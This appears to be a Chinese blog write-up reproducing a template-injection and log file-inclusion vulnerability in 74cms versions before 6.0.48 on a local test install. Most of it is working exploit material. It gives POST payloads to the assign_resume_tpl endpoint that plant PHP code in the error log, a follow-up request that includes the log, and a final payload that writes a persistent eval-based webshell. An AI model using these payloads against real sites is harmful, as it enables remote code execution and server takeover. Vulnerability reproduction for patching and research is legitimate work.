骑士CMS<6.0.48 模板注入文件包含漏洞复现及遇到的坑

1、坑

payload：variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

 

涉及中文，用burp搞了很长时间，还是不能复现，最后看到timeline的文章，使用hackbar发送post包，成功复现

2、影响版本

骑士CMS<6.0.48 

3、复现流程

1、常规的就不说了，下载地址https://www.74cms.com/download/index.html，注意下载6.0版本的

 

2、扔phpstudy根目录下搭建，注意php版本建议使用5.3，不支持5.3以下，php7.0安装时第二步无法跳到第三步

 

 3、搭建成功后，进入http://127.0.0.1/74cms/upload/install.php进行安装

 

4、安装完成后进入首页

 

 5、payload:

index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

使用hackbar发送数据包

 

 

此时安装目录日志内已有相关错误日志

再次发送post包：variable=1&tpl=data/Runtime/Logs/Home/当天年月日.log

 

 

 

 

 漏洞复现成功

写入一句话payload:

variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

四、参考链接

https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg

https://www.cnblogs.com/twlr/p/14142870.html